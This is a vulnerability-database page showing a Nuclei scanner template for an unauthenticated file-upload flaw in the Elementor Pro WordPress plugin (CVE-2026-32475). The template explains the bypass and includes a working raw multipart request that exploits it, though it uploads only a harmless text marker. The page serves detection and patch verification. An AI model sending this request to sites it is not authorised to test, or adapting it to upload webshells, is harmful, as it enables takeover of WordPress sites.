Lucene search
+L

Elementor Pro <=4.2.1 - Unauthenticated Arbitrary File Upload via Form Handler

🗓️ 28 Aug 2026 05:44:37Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

Unauthenticated arbitrary file upload in Elementor Pro <=4.2.1 via Forms File Upload field.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2026-32475
27 Aug 202622:36
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2026-32475
25 Aug 202601:20
githubexploit
circl
Circl
CVE-2026-32475
19 Aug 202623:00
circl
cve
CVE
CVE-2026-32475
19 Aug 202617:24
cve
cvelist
Cvelist
CVE-2026-32475 WordPress Elementor Pro plugin <= 4.2.1 - Arbitrary File Upload vulnerability
19 Aug 202617:24
cvelist
euvd
EUVD
EUVD-2026-62595
19 Aug 202617:24
euvd
kitploit
Kitploit
CVE-2026-32475
22 Aug 202621:49
kitploit
kitploit
Kitploit
Elementor-Pro-Unauthenticated-Arbitrary-File-Upload-to-RCE
24 Aug 202617:27
kitploit
kitploit
Kitploit
CVE-2026-32475-PoC
27 Aug 202601:32
kitploit
kitploit
Kitploit
CVE-2026-32475
28 Aug 202612:13
kitploit
Rows per page
id: CVE-2026-32475

info:
  name: Elementor Pro <=4.2.1 - Unauthenticated Arbitrary File Upload via Form Handler
  author: pdteam
  severity: critical
  description: |
    Elementor Pro plugin for WordPress in versions <=4.2.1 is vulnerable to unauthenticated arbitrary file upload in the Forms module File Upload field. The validation() and process_field() methods iterate over submitted file entries with different early-exit logic for UPLOAD_ERR_NO_FILE entries. When an attacker submits two file parts for the same upload field — an empty first entry (blank filename triggering UPLOAD_ERR_NO_FILE) followed by a payload — validation() returns early after the empty entry without ever type-checking the payload, while process_field() only skips (continue) the empty entry and moves the payload to wp-content/uploads/elementor/forms/. The AJAX action elementor_pro_forms_send_form requires no authentication or nonce.
  impact: |
    Unauthenticated remote code execution is achievable by uploading a PHP file to a web-accessible public directory (wp-content/uploads/elementor/forms/). Any file type can bypass the extension blocklist, including PHP webshells.
  remediation: |
    Update Elementor Pro to version 4.2.2 or later. The fix aligns the validation() and process_field() loops to consistently handle empty file entries.
  reference:
    - https://patchstack.com/articles/critical-unauthenticated-file-upload-to-rce-in-elementor-pro-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-32475
    - https://github.com/absholi7ly/Elementor-Pro-Unauthenticated-Arbitrary-File-Upload-to-RCE
    - https://www.bleepingcomputer.com/news/security/critical-elementor-pro-bug-exposes-wordpress-sites-to-rce-attacks/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.0
    cve-id: CVE-2026-32475
    cwe-id: CWE-434
    epss-score: 0.00645
    epss-percentile: 0.48335
  metadata:
    verified: true
    max-request: 3
    vendor: elementor
    product: elementor-pro
    framework: wordpress
    fofa-query: body="/plugins/elementor-pro/"
    shodan-query: html:"/plugins/elementor-pro/"
    publicwww-query: "/wp-content/plugins/elementor-pro/"
  tags: cve,cve2026,elementor,elementor-pro,wordpress,wp-plugin,file-upload,unauth,rce,intrusive,vkev,vuln

variables:
  marker: "{{rand_text_alpha(12)}}"
  fname: "{{rand_text_alpha(8)}}.txt"

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/elementor-pro/readme.txt"

    matchers:
      - type: word
        words:
          - "Elementor Pro"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        name: post_id
        group: 1
        regex:
          - 'name="post_id"\s+value="(\d+)"'
          - '"post_id"\s*:\s*"?(\d+)"?'
        internal: true

      - type: regex
        name: form_id
        group: 1
        regex:
          - 'name="form_id"\s+value="([a-f0-9A-F]{4,16})"'
          - '"form_id"\s*:\s*"([a-f0-9A-F]{4,16})"'
        internal: true

      - type: regex
        name: field_id
        group: 1
        regex:
          - 'name="form_fields\[([^\]]+)\]"\s[^>]*type="file"'
          - 'type="file"\s[^>]*name="form_fields\[([^\]]+)\]"'
        internal: true

      - type: regex
        name: text_field
        group: 1
        regex:
          - 'name="form_fields\[([^\]]+)\]"\s[^>]*type="text"'
          - 'type="text"\s[^>]*name="form_fields\[([^\]]+)\]"'
        internal: true

      - type: regex
        name: email_field
        group: 1
        regex:
          - 'name="form_fields\[([^\]]+)\]"\s[^>]*type="email"'
          - 'type="email"\s[^>]*name="form_fields\[([^\]]+)\]"'
        internal: true

    matchers:
      - type: word
        words:
          - "elementor-form"
          - 'type="file"'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=WebKitFormBoundarySBDsMGAl
        X-Requested-With: XMLHttpRequest
        Accept: application/json, text/javascript, */*; q=0.01
        Connection: close

        --WebKitFormBoundarySBDsMGAl
        Content-Disposition: form-data; name="action"

        elementor_pro_forms_send_form
        --WebKitFormBoundarySBDsMGAl
        Content-Disposition: form-data; name="post_id"

        {{post_id}}
        --WebKitFormBoundarySBDsMGAl
        Content-Disposition: form-data; name="form_id"

        {{form_id}}
        --WebKitFormBoundarySBDsMGAl
        Content-Disposition: form-data; name="queried_id"

        {{post_id}}
        --WebKitFormBoundarySBDsMGAl
        Content-Disposition: form-data; name="referrer"

        {{BaseURL}}
        --WebKitFormBoundarySBDsMGAl
        Content-Disposition: form-data; name="form_fields[{{text_field}}]"

        Test User
        --WebKitFormBoundarySBDsMGAl
        Content-Disposition: form-data; name="form_fields[{{email_field}}]"

        [email protected]
        --WebKitFormBoundarySBDsMGAl
        Content-Disposition: form-data; name="form_fields[{{field_id}}][0]"; filename=""
        Content-Type: application/octet-stream

        --WebKitFormBoundarySBDsMGAl
        Content-Disposition: form-data; name="form_fields[{{field_id}}][1]"; filename="{{fname}}"
        Content-Type: text/plain

        CVE-2026-32475-PoC-{{marker}}
        --WebKitFormBoundarySBDsMGAl--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'

      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "not_allowed"
          - "are not allowed to access this page"
          - "permission_denied"
          - "invalid_nonce"
          - "rest_forbidden"
        negative: true

    extractors:
      - type: regex
        part: body
        name: upload_confirmed
        regex:
          - '"success"\s*:\s*true'
# digest: 4a0a00473045022100ec05ee219ffd57fcc5f61399da020c4d3a3ebdf3dbb539d3ce4383eebb44c6b90220220306165fb26fcc7b40e3ff3e18ac8a6b3a1d257c4644541514e2fa945c34e5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Aug 2026 12:55Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.19
EPSS0.00645
SSVC
5